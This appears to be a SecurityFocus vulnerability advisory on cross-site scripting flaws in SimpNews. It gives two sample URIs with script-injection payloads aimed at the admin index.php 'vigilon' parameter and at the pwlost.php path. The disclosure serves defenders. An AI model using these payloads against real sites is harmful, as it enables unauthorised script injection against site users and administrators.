SimpNews Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a web client.

Sample URIs have been provided:

http://www.example.com/simpnews/admin/index.php?vigilon=>"><ScRiPt>alert("XSS")</ScRiPt>

http://www.example.com/simpnews/admin/pwlost.php/%3E%22%3E%3CScRiPt%3Ealert("XSS")%3C/ScRiPt%3E


 

Privacy Statement
Copyright 2010, SecurityFocus